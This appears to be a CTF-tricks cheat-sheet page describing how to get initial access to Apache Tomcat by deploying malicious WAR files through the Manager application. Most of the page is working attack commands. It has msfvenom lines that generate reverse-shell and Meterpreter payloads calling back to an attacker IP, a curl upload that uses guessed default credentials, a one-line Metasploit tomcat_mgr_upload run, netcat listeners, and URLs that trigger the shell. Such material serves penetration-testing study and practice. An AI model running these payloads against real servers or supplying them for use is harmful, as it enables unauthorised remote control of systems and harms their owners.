> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-exploit/initial-access-web-exploit-tomcat.md).

# Tomcat

## Tomcat Manager App RCE Via War Upload

You can gain initial access by generating a malicious WAR file containing a JSP reverse shell and deploying it via the accessible Tomcat Manager application.

To craft payloads like remote tcp shells, you can use `msfvenom`. This tool is used to generate standalone payloads.

Generate the WAR payload:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<listener_port> -f war -o revshell.war
```

The basic syntax for msfvenom involves specifying the payload, format, and connection details. In this command:

* `-p` specifies the payload to use. `java/jsp_shell_reverse_tcp` creates a reverse shell payload suitable for JSP environments.
* `LHOST` (local host) specifies the IP address of the attacker machine to which the target machine will connect back.
* `LPORT` (local port) specifies the port number of the attacker machine to which the target machine will connect back.
* `-f` specifies the output format. `war` packages the payload into a Web Application Archive file.
* `-o` is used to specify the output file name.

You can list available payloads using `msfvenom -l payloads` and available formats using `msfvenom -l formats`.

Set up a listener on `<listener_port>`. A simple `netcat` listener can be used:

```bash
nc -lvnp <listener_port>
```

Alternatively, you can use `msfconsole` with a handler:

```bash
msfconsole
use exploit/multi/handler
set PAYLOAD java/jsp_shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT <listener_port>
exploit
```

Upload the generated `revshell.war` file through the Tomcat Manager web interface under the "WAR file to deploy" section. Once uploaded, the shell can be accessed by navigating to `http://<target-ip>:<tomcat-port>/<war-name>/`, typically at a URL like `/revshell/` or `/revshell/revshell.jsp`, to trigger the reverse connection back to your listener.

***

## Tomcat Manager Script RCE

Generate a WAR file containing a reverse shell payload using `msfvenom`:

```bash
msfvenom -p java/shell_reverse_tcp lhost=<attacker_ip> lport=4444 -f war -o reverse_shell.war
```

`msfvenom` can also generate other Java-based payloads suitable for deployment in a web application context, such as a Meterpreter reverse shell WAR or a JSP shell:

```bash
msfvenom -p java/meterpreter/reverse_tcp LHOST=<Attacker IP> LPORT=<Listening Port> -f war -o shell.war
```

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Listening Port> -f raw > shell.jsp
```

Deploy the malicious WAR file to the Tomcat Manager application using `curl`, leveraging credentials (e.g., obtained via other means) that have the `manager-script` role. The `/manager/text/deploy` command is used to deploy a new web application, or replace an existing one, from a local file, a remote URL, or uploaded from the client machine. This command is available to users with the `manager-script` role.

```bash
curl -v -u tomcat:<password> --upload-file reverse_shell.war "http://<target_ip>:8080/manager/text/deploy?path=/reverse_shell&update=true"
```

Alternatively, if you have file system access to the Tomcat server, you can deploy the WAR file manually or leverage auto-deployment. Simply copy the generated `reverse_shell.war` file into the `webapps` directory of the Tomcat installation. Tomcat will typically automatically detect the new file and deploy it.

Trigger the deployed WAR file to execute the payload. Ensure you have a listener set up. For a WAR deployed via the Manager app or copied to `webapps` under the context path `/reverse_shell`, accessing the root of the deployed application will trigger the payload:

```bash
curl "http://<target_ip>:8080/reverse_shell"
```

If a raw `.jsp` file was deployed (e.g., named `shell.jsp` in the root of a web application), it can be triggered by accessing it directly:

```bash
curl "http://<target_ip>:8080/shell.jsp"
```

Listen for the incoming reverse shell:

```bash
nc -lvnp 4444
```

***

## Tomcat Manager War File Reverse Shell

Generate a WAR file containing a Java reverse shell using `msfvenom`.

```bash
msfvenom -p java/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f war -o shell.war
```

The Java reverse shell payload (`java/shell_reverse_tcp`) executes commands on the target system.

Alternatively, one might generate a Java Meterpreter payload packaged as a WAR file:

```bash
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o /tmp/met.war
```

This command generates a WAR file containing a Java Meterpreter payload.

This method leverages the Apache Tomcat Manager application, specifically its capability to allow WAR file uploads and deployment. Metasploit modules like `exploit/multi/http/tomcat_mgr_upload` or `exploit/multi/http/tomcat_mgr_deploy` are designed to automate this process.

For instance, using the Metasploit framework, the payload generation and deployment can be combined into a single command sequence within the `msfconsole`:

```bash
msfconsole -q -x 'use exploit/multi/http/tomcat_mgr_upload; set RHOSTS 192.168.1.10; set RPORT 8080; set USERNAME tomcat; set PASSWORD tomcat; set TARGETURI /manager/html; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run;'
```

This command sets the target details, authentication credentials for the Tomcat Manager, specifies the target URI for the manager interface, selects the Java Meterpreter payload, sets the listener details, and executes the exploit to upload and deploy the WAR.

Alternatively, once authenticated to the Tomcat Manager interface (usually at `/manager/html`), upload the generated `.war` file via the "WAR file to deploy" section.

After successful deployment (it will likely be accessible at `http://TARGET_IP:8080/shell` or `http://TARGET_IP:8080/met` depending on the output filename), trigger the reverse shell by navigating to the specific endpoint within the deployed application. For the `java/shell_reverse_tcp` payload, this is often `/api.jsp`.

```bash
http://TARGET_IP:8080/shell/api.jsp
```

Ensure a Netcat listener is running on your attack machine on the specified `ATTACKER_PORT` to catch the incoming connection.

```bash
nc -lvnp ATTACKER_PORT
```
